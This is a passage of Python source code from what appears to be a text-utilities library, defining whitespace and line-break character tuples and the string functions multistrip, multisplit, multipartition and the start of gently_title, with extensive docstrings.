line-breaking\n# characters in Python and big\" deep-dive in the big documentation.\n\n_export_name('str_whitespace')\nstr_whitespace = (\n # char decimal hex identity\n ##########################################\n '\\t' , # 9 - 0x0009 - tab\n '\\n' , # 10 - 0x000a - newline\n '\\v' , # 11 - 0x000b - vertical tab\n '\\f' , # 12 - 0x000c - form feed\n '\\r' , # 13 - 0x000d - carriage return\n '\\r\\n' , # bonus! 
the classic DOS newline sequence!\n '\\x1c' , # 28 - 0x001c - file separator\n '\\x1d' , # 29 - 0x001d - group separator\n '\\x1e' , # 30 - 0x001e - record separator\n '\\x1f' , # 31 - 0x001f - unit separator\n ' ' , # 32 - 0x0020 - space\n '\\x85' , # 133 - 0x0085 - next line\n '\\xa0' , # 160 - 0x00a0 - non-breaking space\n '\\u1680', # 5760 - 0x1680 - ogham space mark\n '\\u2000', # 8192 - 0x2000 - en quad\n '\\u2001', # 8193 - 0x2001 - em quad\n '\\u2002', # 8194 - 0x2002 - en space\n '\\u2003', # 8195 - 0x2003 - em space\n '\\u2004', # 8196 - 0x2004 - three-per-em space\n '\\u2005', # 8197 - 0x2005 - four-per-em space\n '\\u2006', # 8198 - 0x2006 - six-per-em space\n '\\u2007', # 8199 - 0x2007 - figure space\n '\\u2008', # 8200 - 0x2008 - punctuation space\n '\\u2009', # 8201 - 0x2009 - thin space\n '\\u200a', # 8202 - 0x200a - hair space\n '\\u2028', # 8232 - 0x2028 - line separator\n '\\u2029', # 8233 - 0x2029 - paragraph separator\n '\\u202f', # 8239 - 0x202f - narrow no-break space\n '\\u205f', # 8287 - 0x205f - medium mathematical space\n '\\u3000', # 12288 - 0x3000 - ideographic space\n )\n_export_name('str_whitespace_without_crlf')\nstr_whitespace_without_crlf = tuple(s for s in str_whitespace if s != '\\r\\n')\n\n_export_name('whitespace')\nwhitespace = str_whitespace\n_export_name('whitespace_without_crlf')\nwhitespace_without_crlf = str_whitespace_without_crlf\n\n_export_name('unicode_whitespace')\nunicode_whitespace = tuple(s for s in str_whitespace if not ('\\x1c' <= s <= '\\x1f'))\n_export_name('unicode_whitespace_without_crlf')\nunicode_whitespace_without_crlf = tuple(s for s in unicode_whitespace if s != '\\r\\n')\n\n_export_name('ascii_whitespace')\nascii_whitespace = tuple(s for s in unicode_whitespace if (s < '\\x80'))\n_export_name('ascii_whitespace_without_crlf')\nascii_whitespace_without_crlf = tuple(s for s in ascii_whitespace if s != '\\r\\n')\n\n_export_name('bytes_whitespace')\nbytes_whitespace = encode_strings(ascii_whitespace)\n_export_name('bytes_whitespace_without_crlf')\nbytes_whitespace_without_crlf = tuple(s for s in bytes_whitespace if s != b'\\r\\n')\n\n\n_export_name('str_linebreaks')\nstr_linebreaks = (\n # char decimal hex identity\n ##########################################\n '\\n' , # 10 - 0x000a - newline\n '\\v' , # 11 - 0x000b - vertical tab\n '\\f' , # 12 - 0x000c - form feed\n '\\r' , # 13 - 0x000d - carriage return\n '\\r\\n' , # bonus! the classic DOS newline sequence!\n '\\x1c' , # 28 - 0x001c - file separator\n '\\x1d' , # 29 - 0x001d - group separator\n '\\x1e' , # 30 - 0x001e - record separator\n '\\x85' , # 133 - 0x0085 - next line\n '\\u2028', # 8232 - 0x2028 - line separator\n '\\u2029', # 8233 - 0x2029 - paragraph separator\n\n # what about '\\n\\r'?\n # sorry, Acorn and RISC OS users, you'll have to add this yourselves.\n # I'm worried it would cause bugs with a malformed DOS string,\n # or maybe when operating in reverse mode.\n #\n # Also: welcome, Acorn and RISC OS users!\n # What are you doing here? 
You can't run Python 3.6+!\n )\n_export_name('str_linebreaks_without_crlf')\nstr_linebreaks_without_crlf = tuple(s for s in str_linebreaks if s != '\\r\\n')\n\n_export_name('linebreaks')\nlinebreaks = str_linebreaks\n_export_name('linebreaks_without_crlf')\nlinebreaks_without_crlf = str_linebreaks_without_crlf\n\n_export_name('unicode_linebreaks')\nunicode_linebreaks = tuple(s for s in str_linebreaks if not ('\\x1c' <= s <= '\\x1f'))\n_export_name('unicode_linebreaks_without_crlf')\nunicode_linebreaks_without_crlf = tuple(s for s in unicode_linebreaks if s != '\\r\\n')\n\n_export_name('ascii_linebreaks')\nascii_linebreaks = tuple(s for s in unicode_linebreaks if s < '\\x80')\n_export_name('ascii_linebreaks_without_crlf')\nascii_linebreaks_without_crlf = tuple(s for s in ascii_linebreaks if s != '\\r\\n')\n\n_export_name('bytes_linebreaks')\nbytes_linebreaks = (\n b'\\n' , # 10 0x000a - newline\n b'\\r' , # 13 0x000d - carriage return\n b'\\r\\n' , # the classic DOS newline sequence\n )\n_export_name('bytes_linebreaks_without_crlf')\nbytes_linebreaks_without_crlf = tuple(s for s in bytes_linebreaks if s != b'\\r\\n')\n\n\n# Before 10.1, big used the word \"newlines\" instead of \"linebreaks\"\n# in the names of these tuples. I realized in September 2023 that\n# \"linebreaks\" was a better name; Unicode uses the term \"line breaks\"\n# for these characters.\n#\n# Similarly, \"_without_crlf\" used to be \"_without_dos\". As much\n# as we might dream about a world without DOS, _without_crlf is\n# far more accurate.\n#\n# Here's some backwards-compatibility for you.\n# I promise to keep the old names around until September 2024.\n_export_name('whitespace_without_dos')\nwhitespace_without_dos = str_whitespace_without_crlf\n\n_export_name('ascii_whitespace_without_dos')\nascii_whitespace_without_dos = bytes_whitespace_without_crlf\n\n_export_name('newlines')\nnewlines = str_linebreaks\n_export_name('newlines_without_dos')\nnewlines_without_dos = str_linebreaks_without_crlf\n\n_export_name('ascii_newlines')\nascii_newlines = bytes_linebreaks\n_export_name('ascii_newlines_without_dos')\nascii_newlines_without_dos = bytes_linebreaks_without_crlf\n\n# These old tuples are deprecated, because it's easy to make\n# them yourself (and a million other variants) with encode_strings().\n# They'll be removed when I remove the backwards-compatibility\n# names above.\n_export_name('utf8_whitespace')\nutf8_whitespace = encode_strings(str_whitespace, \"utf-8\")\n_export_name('utf8_whitespace_without_dos')\nutf8_whitespace_without_dos = tuple(b for b in utf8_whitespace if b != b'\\r\\n')\n\n_export_name('utf8_newlines')\nutf8_newlines = encode_strings(str_linebreaks, \"utf-8\")\n_export_name('utf8_newlines_without_dos')\nutf8_newlines_without_dos = tuple(b for b in utf8_newlines if b != b'\\r\\n')\n\n\n# reverse an iterable thing.\n# o must be str, bytes, list, tuple, set, or frozenset.\n# if o is a collection (not str or bytes),\n# the elements of o are recursively reversed.\n# value returned is the same type as o.\n#\n# we don't need to bother checking the type of o.\n# _multisplit_reversed is an internal function\n# and I've manually checked every call site.\ndef _multisplit_reversed(o, name='s'):\n if isinstance(o, str):\n if len(o) <= 1:\n return o\n return \"\".join(reversed(o))\n if isinstance(o, bytes):\n if len(o) <= 1:\n return o\n return b\"\".join(o[i:i+1] for i in range(len(o)-1, -1, -1))\n # assert isinstance(o, (list, tuple, set, frozenset))\n t = type(o)\n return t(_multisplit_reversed(p) for p in 
o)\n\n\n# _reversed_builtin_separators precalculates the reversed versions\n# of the builtin separators. we use the reversed versions when\n# reverse=True. this is a minor speed optimization, particularly\n# as it helps with the lrucache for _separators_to_re.\n#\n# we test that these cached versions are correct in tests/test_text.py.\n#\n_reversed_utf8_whitespace_without_dos = _multisplit_reversed(utf8_whitespace_without_dos)\n_reversed_utf8_newlines_without_dos = _multisplit_reversed(utf8_newlines_without_dos)\n\n_reversed_builtin_separators = {\n str_whitespace: str_whitespace_without_crlf + ('\\n\\r',),\n str_whitespace_without_crlf: str_whitespace_without_crlf,\n\n unicode_whitespace: unicode_whitespace_without_crlf + ('\\n\\r',),\n unicode_whitespace_without_crlf: unicode_whitespace_without_crlf,\n\n ascii_whitespace: ascii_whitespace_without_crlf + (\"\\n\\r\",),\n ascii_whitespace_without_crlf: ascii_whitespace_without_crlf,\n\n str_linebreaks: str_linebreaks_without_crlf + (\"\\n\\r\",),\n str_linebreaks_without_crlf: str_linebreaks_without_crlf,\n\n unicode_linebreaks: unicode_linebreaks_without_crlf + (\"\\n\\r\",),\n unicode_linebreaks_without_crlf: unicode_linebreaks_without_crlf,\n\n bytes_linebreaks: bytes_linebreaks_without_crlf + (b\"\\n\\r\",),\n bytes_linebreaks_without_crlf: bytes_linebreaks_without_crlf,\n\n # deprecated\n utf8_whitespace: _reversed_utf8_whitespace_without_dos + (b\"\\n\\r\",),\n utf8_whitespace_without_dos: _reversed_utf8_whitespace_without_dos,\n\n utf8_newlines: _reversed_utf8_newlines_without_dos + (b\"\\n\\r\",),\n utf8_newlines_without_dos: _reversed_utf8_newlines_without_dos,\n }\n\n\ndef _re_quote(s):\n # don't bother escaping whitespace.\n # re.escape escapes whitespace because of VERBOSE mode,\n # which we're not using. (escaping the whitespace doesn't\n # hurt anything really, but it makes the patterns harder\n # to read for us humans.)\n if not s.isspace():\n return re.escape(s)\n if len(s) > 1:\n if isinstance(s, bytes):\n return b\"(?:\" + s + b\")\"\n return f\"(?:{s})\"\n return s\n\n\n@functools.lru_cache(re._MAXCACHE)\ndef __separators_to_re(separators, separators_is_bytes, separate=False, keep=False):\n if separators_is_bytes:\n pipe = b'|'\n separate_start = b'(?:'\n separate_end = b')+'\n keep_start = b'('\n keep_end = b')'\n else:\n pipe = '|'\n separate_start = '(?:'\n separate_end = ')+'\n keep_start = '('\n keep_end = ')'\n\n # sort longer separator strings earlier.\n # re processes | operator from left-to-right,\n # so you want to match against longer strings first.\n separators = list(separators)\n separators.sort(key=lambda o: -len(o))\n pattern = pipe.join(_re_quote(o) for o in separators)\n if not separate:\n pattern = separate_start + pattern + separate_end\n if keep:\n pattern = keep_start + pattern + keep_end\n return pattern\n\ndef _separators_to_re(separators, separators_is_bytes, separate=False, keep=False):\n # this ensures that separators is hashable,\n # which will keep functools.lru_cache happy.\n try:\n hash(separators)\n except TypeError:\n separators = tuple(separators)\n return __separators_to_re(separators, separators_is_bytes, separate=bool(separate), keep=bool(keep))\n\n\n\n@_export\ndef multistrip(s, separators, left=True, right=True):\n \"\"\"\n Like str.strip, but supports stripping multiple strings.\n\n Strips from the string \"s\" all leading and trailing\n instances of strings found in \"separators\".\n\n Returns a copy of s with the leading and/or trailing\n separators stripped. 
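For example (an illustrative sketch):\n\n        multistrip('xxyyabcyyxx', ('x', 'y'))       # -> 'abc'\n        multistrip('xxabcxx', ('x',), right=False)  # -> 'abcxx'\n\n    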
(If left and right are both false,\n    the contents are unchanged.)\n\n    s should be str or bytes.\n    separators should be an iterable of either str or bytes\n    objects matching the type of s.\n\n    If left is a true value, strips all leading separators\n    from s.\n\n    If right is a true value, strips all trailing separators\n    from s.\n\n    multistrip first removes leading separators, until the\n    string does not start with a separator (or is empty).\n    Then it removes trailing separators, until the string\n    does not end with a separator (or is empty).\n\n    multistrip is \"greedy\"; if more than one separator\n    matches, multistrip will strip the longest one.\n\n    You can pass in an instance of a subclass of bytes or str\n    for s and elements of separators, but the base class\n    for both must be the same (str or bytes).  multistrip will\n    only return str or bytes objects, even if left and right\n    are both false.\n    \"\"\"\n\n    is_bytes = isinstance(s, bytes)\n    if is_bytes:\n        s_type = bytes\n        head = b'^'\n        tail = b'$'\n\n        if isinstance(separators, str):\n            raise TypeError(\"separators must be an iterable of non-empty objects the same type as s\")\n        if isinstance(separators, bytes):\n            # not iterable of bytes, literally a bytes string.\n            # split it ourselves.  otherwise, _separators_to_re will\n            # iterate over it, which... yields integers!  oops!\n            separators = tuple(_iterate_over_bytes(separators))\n            check_separators = False\n        else:\n            check_separators = True\n    else:\n        s_type = str\n        head = '^'\n        tail = '$'\n\n        if isinstance(separators, bytes):\n            raise TypeError(\"separators must be an iterable of non-empty objects the same type as s\")\n        if isinstance(separators, str):\n            separators = tuple(separators)\n            check_separators = False\n        else:\n            check_separators = True\n\n    if not separators:\n        raise ValueError(\"separators must be an iterable of non-empty objects the same type as s\")\n    if check_separators:\n        s2 = []\n        for o in separators:\n            if not isinstance(o, s_type):\n                raise TypeError(\"separators must be an iterable of non-empty objects the same type as s\")\n            if not o:\n                raise ValueError(\"separators must be an iterable of non-empty objects the same type as s\")\n            s2.append(o)\n        separators = tuple(s2)\n\n    # deliberately do this *after* checking types,\n    # so we complain about bad types even if this is a do-nothing call.\n    if not (left or right):\n        return s\n\n    # we can sidestep the hashability test of _separators_to_re,\n    # separators is guaranteed to always be a tuple at this point\n    pattern = __separators_to_re(separators, is_bytes, separate=False, keep=False)\n\n    start = 0\n    end = len(s)\n    if left:\n        left_match = re.match(head + pattern, s)\n        if left_match:\n            start = left_match.end(0)\n            s = s[start:]\n    if right:\n        right_match = re.search(pattern + tail, s)\n        if right_match:\n            end = right_match.start(0)\n            s = s[:end]\n    return s\n\n\n# for keep\nAS_PAIRS=\"AS_PAIRS\"\n_export_name(AS_PAIRS)\nALTERNATING=\"ALTERNATING\"\n_export_name(ALTERNATING)\n\n# for strip\nLEFT = \"LEFT\"\n_export_name(LEFT)\nRIGHT = \"RIGHT\"\n_export_name(RIGHT)\nPROGRESSIVE = \"PROGRESSIVE\"\n_export_name(PROGRESSIVE)\n\n@_export\ndef multisplit(s, separators=None, *,\n    keep=False,\n    maxsplit=-1,\n    reverse=False,\n    separate=False,\n    strip=False,\n    ):\n    \"\"\"\n    Splits strings like str.split, but with multiple separators and options.\n\n    s can be str or bytes.\n\n    separators should either be None (the default),\n    or an iterable of str or bytes, matching s.\n\n    If separators is None and s is str, multisplit will\n    use 
big.whitespace as the list of separators.\n If separators is None and s is bytes, multisplit will\n use big.ascii_whitespace as the list of separators.\n\n Returns an iterator yielding the strings split from s. If keep\n is true (or ALTERNATING), and strip is false, joining these strings\n together will recreate s.\n\n multisplit is \"greedy\": if two or more separators start at the same\n location in \"s\", multisplit splits using the longest matching separator.\n For example:\n big.multisplit('wxabcyz', ('a', 'abc'))\n yields 'wx' then 'yz'.\n\n \"keep\" indicates whether or not multisplit should keep the separator\n strings. It supports four values:\n false (the default)\n Discard the separators.\n true (apart from ALTERNATING and AS_PAIRS)\n Append the separators to the end of the split strings.\n You can recreate the original string by passing the\n list returned in to ''.join.\n ALTERNATING\n Yield alternating strings in the output: strings consisting\n of separators, alternating with strings consisting of\n non-separators. If \"separate\" is true, separator strings\n will contain exactly one separator, and non-separator strings\n may be empty; if \"separate\" is false, separator strings will\n contain one or more separators, and non-separator strings\n will never be empty.\n You can recreate the original string by passing the\n list returned in to ''.join.\n AS_PAIRS\n Yield 2-tuples containing a non-separator string and its\n subsequent separator string. Either string may be empty;\n the separator string in the last 2-tuple will always be\n empty, and if `s` ends with a separator string, *both*\n strings in the final 2-tuple will be empty.\n\n \"separate\" indicates whether multisplit should consider adjacent\n separator strings in s as one separator or as multiple separators\n each separated by a zero-length string. It supports two values:\n false (the default)\n Multiple adjacent separators should be considered one\n separator.\n true\n Don't group separators together. Each separator should\n split the string individually, even if there are no\n characters between two separators.\n\n \"strip\" indicates whether multisplit should strip separators from\n the beginning and/or end of s, a la multistrip. It supports\n six values:\n false (the default)\n Don't strip separators from the beginning or end of s.\n true (apart from LEFT, RIGHT, and PROGRESSIVE)\n Strip separators from the beginning and end of s\n (a la str.strip).\n LEFT\n Strip separators only from the beginning of s\n (a la str.lstrip).\n RIGHT\n Strip separators only from the end of s\n (a la str.rstrip).\n PROGRESSIVE\n Strip from the beginning and end of s, unless maxsplit\n is nonzero and the entire string is not split. If\n splitting stops due to maxsplit before the entire string\n is split, and reverse is false, don't strip the end of\n the string. If splitting stops due to maxsplit before\n the entire string is split, and reverse is true, don't\n strip the beginning of the string. (This is how str.strip\n and str.rstrip behave when sep=None.)\n\n \"maxsplit\" should be either an integer or None. If maxsplit is an\n integer greater than -1, multisplit will split s no more than\n maxsplit times.\n\n \"reverse\" controls whether multisplit splits starting from the\n beginning or from the end of the string. 
It supports two values:\n false (the default)\n Start splitting from the beginning of the string\n and scanning right.\n true\n Start splitting from the end of the string and\n scanning left.\n Splitting from the end of the string and scanning left has two\n effects. First, if maxsplit is a number greater than 0,\n the splits will start at the end of the string rather than\n the beginning. Second, if there are overlapping instances of\n separators in the string, multisplit will prefer the rightmost\n separator rather than the left. For example:\n multisplit(\"A x x Z\", (\" x \",), keep=big.ALTERNATING)\n will split on the leftmost instance of \" x \", yielding\n \"A\", \" x \", \"x Z\"\n whereas\n multisplit(\"A x x Z\", (\" x \",), keep=big.ALTERNATING, reverse=True)\n will split on the rightmost instance of \" x \", yielding\n \"A x\", \" x \", \"Z\"\n\n You can pass in an instance of a subclass of bytes or str\n for s and elements of separators, but the base class\n for both must be the same (str or bytes). multisplit will\n only return str or bytes objects.\n \"\"\"\n is_bytes = isinstance(s, bytes)\n separators_is_bytes = isinstance(separators, bytes)\n separators_is_str = isinstance(separators, str)\n\n if is_bytes:\n if separators_is_bytes:\n # not iterable of bytes, literally a bytes string.\n # split it ourselves.\n separators = tuple(_iterate_over_bytes(separators))\n check_separators = False\n else:\n if separators_is_str:\n raise TypeError(f\"separators must be either None or an iterable of objects the same type as s; s is {type(s).__name__}, separators is {separators!r}\")\n check_separators = True\n empty = b''\n s_type = bytes\n else:\n if separators_is_bytes:\n raise TypeError(f\"separators must be either None or an iterable of objects the same type as s; s is {type(s).__name__}, separators is {separators!r}\")\n check_separators = True\n empty = ''\n s_type = str\n\n if separators is None:\n separators = bytes_whitespace if is_bytes else whitespace\n check_separators = False\n elif not separators:\n raise ValueError(f\"separators must be either None or an iterable of objects the same type as s; s is {type(s).__name__}, separators is {separators!r}\")\n\n # check_separators is True if separators isn't str or bytes\n # or something we split ourselves.\n if check_separators:\n if not hasattr(separators, '__iter__'):\n raise TypeError(f\"separators must be either None or an iterable of objects the same type as s; s is {type(s).__name__}, separators is {separators!r}\")\n for o in separators:\n if not isinstance(o, s_type):\n raise TypeError(f\"separators must be either None or an iterable of objects the same type as s; s is {type(s).__name__}, separators is {separators!r}\")\n\n separators_to_re_keep = keep\n\n if strip:\n if strip == PROGRESSIVE:\n if maxsplit == -1:\n strip = left = right = True\n else:\n left = not reverse\n right = reverse\n separators_to_re_keep = True\n else:\n left = strip != RIGHT\n right = strip != LEFT\n s = multistrip(s, separators, left=left, right=right)\n if not s:\n # oops! 
all separators!\n # this will make us exit early, just a few lines down from here.\n maxsplit = 0\n\n def multisplit(s, separators, keep, maxsplit, reverse, separate, strip):\n if maxsplit == None:\n maxsplit = -1\n elif maxsplit == 0:\n if keep == ALTERNATING:\n yield s\n elif keep == AS_PAIRS:\n yield (s, empty)\n else:\n yield s\n return\n\n # convert maxsplit for use with re.split.\n #\n # re.split interprets maxsplit slightly differently:\n # its maxsplit==0 means \"allow all splits\".\n # its maxsplit==1 means \"only allow one split\".\n #\n # (re.split doesn't have a way to express\n # \"don't split\" with its maxsplit parameter,\n # which is why we handled it already.)\n re_split_maxsplit = 0 if maxsplit == -1 else maxsplit\n\n if reverse:\n # if reverse is true, when separators overlap,\n # we need to prefer the rightmost one rather than\n # the leftmost one. how do we do *that*?\n # Eric Smith had the brainstorm: reverse the string\n # and the separators, split, and reverse the output\n # and the strings in the output.\n s = _multisplit_reversed(s, 's')\n separators = tuple(separators)\n s2 = _reversed_builtin_separators.get(separators, None)\n if s2 != None:\n separators = s2\n else:\n separators = _multisplit_reversed(separators, 'separators')\n\n pattern = _separators_to_re(separators, is_bytes, keep=separators_to_re_keep, separate=separate)\n # print(\"PATTERN\", pattern, f\"{separators_to_re_keep=} {separate=}\")\n\n l = re.split(pattern, s, re_split_maxsplit)\n assert l\n # print(\"S\", repr(s), \"L\", l, f\"{re_split_maxsplit=}\")\n\n if strip == PROGRESSIVE:\n # l alternates nonsep and sep strings.\n # it's always an odd length, starting and ending with nonsep.\n length = len(l)\n assert length & 1\n\n desired_length = 1 + (2*maxsplit)\n\n # dang! 
this is complicated!\n            # maxsplit has to extend *past* the last nonsep\n            # for us to strip on the far side.\n            #    ' a b c '.split(None, maxsplit=2) => ['a', 'b', 'c ']\n            #    ' a b c '.split(None, maxsplit=3) => ['a', 'b', 'c']\n            for i in range(length - 1, 0, -2):\n                nonsep = l[i]\n                if nonsep:\n                    last_non_empty_nonsep = i\n                    break\n            else:\n                last_non_empty_nonsep = 0\n\n            if desired_length > (last_non_empty_nonsep + 2):\n                # strip!\n                l = l[:last_non_empty_nonsep + 1]\n                desired_length = length = last_non_empty_nonsep\n\n        if not keep:\n            for i in range(len(l) - 2, 0, -2):\n                del l[i]\n\n        if reverse:\n            l = _multisplit_reversed(l, 'l')\n            l.reverse()\n\n        if not keep:\n            l.reverse()\n            while l:\n                yield l.pop()\n            return\n\n        # from here on out, we're 'keep'-ing the separator strings.\n        # (we're returning the separator strings in one form or another.)\n\n        if keep == ALTERNATING:\n            l.reverse()\n            while l:\n                yield l.pop()\n            return\n\n        if (len(l) % 2) == 1:\n            l.append(empty)\n\n        previous = None\n        l.reverse()\n        while l:\n            o = l.pop()\n            if previous is None:\n                previous = o\n                continue\n            if keep == AS_PAIRS:\n                yield (previous, o)\n            else:\n                yield previous + o\n            previous = None\n\n    return multisplit(s, separators, keep, maxsplit, reverse, separate, strip)\n\n\n@_export\ndef multipartition(s, separators, count=1, *, reverse=False, separate=True):\n    \"\"\"\n    Like str.partition, but supports partitioning based on multiple separator\n    strings, and can partition more than once.\n\n    \"s\" can be str or bytes.\n\n    \"separators\" should be an iterable of objects of the same type as \"s\".\n\n    By default, if any of the strings in \"separators\" are found in \"s\",\n    returns a tuple of three strings: the portion of \"s\" leading up to\n    the earliest separator, the separator, and the portion of \"s\" after\n    that separator.  Example:\n\n        multipartition('aXbYz', ('X', 'Y')) => ('a', 'X', 'bYz')\n\n    If none of the separators are found in the string, returns\n    a tuple containing `s` unchanged followed by two empty strings.\n\n    multipartition is *greedy*: if two or more separators appear at\n    the leftmost location in `s`, multipartition partitions using\n    the longest matching separator.  For example:\n\n        big.multipartition('wxabcyz', ('a', 'abc')) => ('wx', 'abc', 'yz')\n\n    Passing in an explicit \"count\" lets you control how many times\n    multipartition partitions the string.  multipartition will always\n    return a tuple containing (2*count)+1 elements.  Passing in a\n    count of 0 will always return a tuple containing s.\n\n    If `separate` is false, multiple adjacent separator strings behave\n    like one separator.  Example:\n\n        big.text.multipartition('aXYbYXc', ('X', 'Y',), count=2, separate=False) => ('a', 'XY', 'b', 'YX', 'c')\n        big.text.multipartition('aXYbYXc', ('X', 'Y',), count=2, separate=True ) => ('a', 'X', '', 'Y', 'bYXc')\n\n    If reverse is true, multipartition behaves like str.rpartition.\n    It partitions starting on the right, scanning backwards through\n    s looking for separators.\n\n    You can pass in an instance of a subclass of bytes or str\n    for s and elements of separators, but the base class\n    for both must be the same (str or bytes). 
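As a further illustrative sketch, partitioning twice:\n\n        multipartition('aXbXc', ('X',), count=2)\n        # -> ('a', 'X', 'b', 'X', 'c')\n\n    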
multipartition\n    will only yield str or bytes objects.\n    \"\"\"\n    if count < 0:\n        raise ValueError(\"count must be >= 0\")\n    result = list(multisplit(s, separators,\n        keep=ALTERNATING,\n        reverse=reverse,\n        separate=separate,\n        strip=False,\n        maxsplit=count))\n    desired_length = (2 * count) + 1\n    result_length = len(result)\n    if result_length < desired_length:\n        if isinstance(s, bytes):\n            empty = (b'',)\n        else:\n            empty = ('',)\n        extension = empty * (desired_length - result_length)\n        if reverse:\n            result = list(extension) + result\n        else:\n            result.extend(extension)\n    return tuple(result)\n\n@_export\ndef multirpartition(s, separators, count=1, *, reverse=False, separate=True):\n    return multipartition(s, separators, count=count, reverse=not reverse, separate=separate)\n\n\n# I declare that, for our purposes,\n#     ` (the \"back-tick\" character U+0060)\n# is *not* an apostrophe.  it's a diacritical\n# used to modify a letter, rather than a\n# separator used to separate letters.\n# It's been (ab)used as an apostrophe historically,\n# but that's because ASCII had a limited number of\n# punctuation characters.\napostrophes = unicode_apostrophes = \"'‘’‚‛\"\n_export_name('apostrophes')\ndouble_quotes = unicode_double_quotes = '\"“”„‟«»‹›'\n_export_name('double_quotes')\n\nascii_apostrophes = b\"'\"\n_export_name('ascii_apostrophes')\nascii_double_quotes = b'\"'\n_export_name('ascii_double_quotes')\n\nutf8_apostrophes = apostrophes.encode('utf-8')\n_export_name('utf8_apostrophes')\nutf8_double_quotes = double_quotes.encode('utf-8')\n_export_name('utf8_double_quotes')\n\n\n_invalid_state = \"_invalid_state\"\n_in_word = \"_in_word\"\n_after_whitespace = \"_after_whitespace\"\n_after_whitespace_then_apostrophe_or_double_quote = \"_after_whitespace_then_apostrophe_or_double_quote\"\n_after_whitespace_then_D_or_O = \"_after_whitespace_then_D_or_O\"\n_after_whitespace_then_D_or_O_then_apostrophe = \"_after_whitespace_then_D_or_O_then_apostrophe\"\n\n_default_str_is_apostrophe = frozenset(unicode_apostrophes).__contains__\n_default_str_is_double_quote = frozenset(unicode_double_quotes).__contains__\n_default_bytes_is_apostrophe = ascii_apostrophes.__eq__\n_default_bytes_is_double_quote = ascii_double_quotes.__eq__\n_str_do_contains = 'DO'.__contains__\n_bytes_do_contains = b'DO'.__contains__\n\n@_export\ndef gently_title(s, *, apostrophes=None, double_quotes=None):\n    \"\"\"\n    Uppercase the first character of every word in s,\n    and leave all other characters alone.\n\n    (For the purposes of this algorithm, words are\n    any blob of non-whitespace characters.)\n\n    Capitalize the letter after an apostrophe if\n        a) the apostrophe is after whitespace or a\n           left parenthesis character ('(')\n           (or is the first letter of the string), or\n        b) if the apostrophe is after a letter O or D,\n           and that O or D is after whitespace (or is\n           the first letter of the string).  The O or D\n           here will also be capitalized.\n    Rule a) handles internally quoted strings:\n        He Said 'No I Did Not'\n    and contractions that start with an apostrophe\n        'Twas The Night Before Christmas\n    Rule b) handles certain Irish, French, and Italian\n    names.\n        Peter O'Toole\n        Lord D'Arcy\n\n    Capitalize the letter after a quote mark if\n    the quote mark is after whitespace (or is the\n    first letter of a string).\n\n    A run of consecutive apostrophes and/or\n    quote marks is considered one quote mark for\n    the purposes of capitalization.\n\n    s should be a str or bytes object. 
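For example (an illustrative sketch):\n\n        gently_title(\"peter o'toole\")       # -> \"Peter O'Toole\"\n        gently_title('MY DOG has FLEAS')    # -> 'MY DOG Has FLEAS'\n\n    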
s can also\n    be an instance of a subclass of str or bytes,\n    however, gently_title will only ever return a\n    str or bytes object.\n\n    If specified, apostrophes and double_quotes should be\n    a string, or an iterable of strings, of the same type\n    as s (or a conformant type).\n\n    If apostrophes is false, gently_title will use a\n    default value for apostrophes:\n        If s is str, the default value is big.text.apostrophes,\n        a string containing all Unicode code points that\n        represent apostrophes.\n\n        If s is bytes, the default value is\n        big.text.ascii_apostrophes, which is the string b\"'\".\n\n    If double_quotes is false, gently_title will use a\n    default value for double_quotes:\n        If s is str, the default value is big.text.double_quotes,\n        a string containing all Unicode code points representing\n        double-quote marks.\n\n        If s is bytes, the default value is\n        big.text.ascii_double_quotes, which is the string b'\"'.\n    \"\"\"\n    if isinstance(s, bytes):\n        s_type = bytes\n        empty = b\"\"\n        _is_d_or_o = _bytes_do_contains\n        lparen = b'('\n        iterator = _iterate_over_bytes\n        default_is_apostrophe = _default_bytes_is_apostrophe\n        default_is_double_quote = _default_bytes_is_double_quote\n    else:\n        s_type = str\n        empty = \"\"\n        default_is_apostrophe = _default_str_is_apostrophe\n        default_is_double_quote = _default_str_is_double_quote\n        _is_d_or_o = _str_do_contains\n        lparen = '('\n        iterator = iter\n\n    if apostrophes is None:\n        _is_apostrophe = default_is_apostrophe\n    else:\n        cast_apostrophes = []\n        for o in iterator(apostrophes):\n            if not isinstance(o, s_type):\n                raise TypeError(f\"apostrophes must be an iterable of non-empty objects the same type as s, or None\")\n            if not o:\n                raise ValueError(\"apostrophes must be an iterable of non-empty objects the same type as s, or None\")\n            cast_apostrophes.append(o)\n        if not cast_apostrophes:\n            raise ValueError(\"apostrophes must be an iterable of non-empty objects the same type as s\")\n        _is_apostrophe = frozenset(cast_apostrophes).__contains__\n\n    if double_quotes is None:\n        _is_double_quote = default_is_double_quote\n    else:\n        cast_double_quotes = []\n        for o in iterator(double_quotes):\n            if not isinstance(o, s_type):\n                raise TypeError(\"double_quotes must be an iterable of non-empty objects the same type as s, or None\")\n            if not o:\n                raise ValueError(\"double_quotes must be an iterable of non-empty objects the same type as s, or None\")\n            cast_double_quotes.append(o)\n        if not cast_double_quotes:\n            raise ValueError(\"double_quotes must be an iterable of non-empty objects the same type as s\")\n        _is_double_quote = frozenset(cast_double_quotes).__contains__\n\n    result = []\n    state = _after_whitespace\n    for c in iterator(s):\n        original_c = c\n        original_state = state\n        is_space = c.isspace() or (c == lparen)\n        is_apostrophe = _is_apostrophe(c)\n        is_double_quote = _is_double_quote(c)\n        if state == _in_word:\n            if is_space:\n                state = _after_whitespace\n        elif state == _after_whitespace:\n            if not is_space:\n                c = c.upper()\n                if (is_apostrophe or is_double_quote):\n                    state = _after_whitespace_then_apostrophe_or_double_quote\n                elif _is_d_or_o(c):\n                    state = _after_whitespace_then_D_or_O\n                else:\n                    state = _in_word\n        elif state == _after_whitespace_then_apostrophe_or_double_quote:\n            if not (is_apostrophe or is_double_quote):\n                c = c.upper()\n                state = _in_word\n        elif state == _after_whitespace_then_D_or_O:\n            if is_apostrophe:\n                state = _after_whitespace_then_D_or_O_then_apostrophe\n            else:\n                state = _in_word\n        elif state == _after_whitespace_then_D_or_O_then_apostrophe:\n            c = c.upper()\n            state = 
